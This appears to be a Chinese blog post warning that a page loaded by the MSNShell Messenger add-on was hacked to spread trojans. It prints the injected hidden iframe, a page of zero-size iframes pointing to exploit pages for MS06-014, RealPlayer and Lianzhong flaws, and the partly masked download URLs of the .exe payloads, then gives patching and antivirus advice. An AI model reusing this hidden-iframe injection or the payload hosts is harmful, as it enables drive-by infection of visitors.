警惕利用msnshell(msn外挂小工具)挂马中毒
事情经过
MSNShell 是一个为了支持 Windows Live Messenger 的发展,提供多种扩展服务及功能的免费增强包。MSNShell 为 Windows Live Messenger 量身定制了多种个性化功能。MSNShell 不但具有客户端定制功能,更扩展了多种附加服务,使用 Windows Live Messenger 将变得更加有趣。
一直用着MSNShell去广告功能,今天突然发现Linkscaner 出现如下提醒
探寻图上给出的地址
htp://shell09.msnshell.com/gol.htm?MV=8.5.1302.1018&SV=4.2.28.32&L=0804&M=********(******为自己的hotmail邮箱地址)
---->
<iframe src=htP://k.j8j8.biz/102/ width=30 height=0></ifram>
---->
<html><TITLE>index</TITLE><BODY>
<iframe src="14.htm" width=100 height=1></iframe>
<iframe src="r.htm" width=100 height=1></iframe>
<iframe src="1.htm" width=100 height=1></iframe>
</body></html>
<script src='htp://s109.cnzz.com/stat.php?id=418402&web_id=418402' language='JavaScript' charset='gb2312'></script>
14.htm---->(ms0614)
htp://vvv.123sky.biz/***/102.exe
r.htm---->(real漏洞)
htp://vvv.123sky.biz/***/102.exe
1.htm---->lz.htm---->(联众漏洞)
htp://vvv.123sky.biz/***/103.exe
还要一个是统计页面
问题探究
不知道是不是msnshell漏洞,但是我猜想不是,应该是msnshell提供的多功能服务里面有个网页被挂马了,所以导致以上我刚才的经过.
有的真是一点不注意,就这样被挂马中招,所以有些经常会感觉我就上个QQ或者MSN怎么也会中毒.
建议
更新系统漏洞
安装正版杀软,升级到更新
采用超级巡警或者360安全对第三方漏洞进行修复
最后群里讨论了一下,其实标题应该是 警惕msnshell主页被植入木马 被挂的页面是htp://shell09.msnshell.com/gol.htm,被黑客直接改了,牵连到msn上使用msnshell外挂的用户也同样被植入木马.猥琐哎...
您的位置: 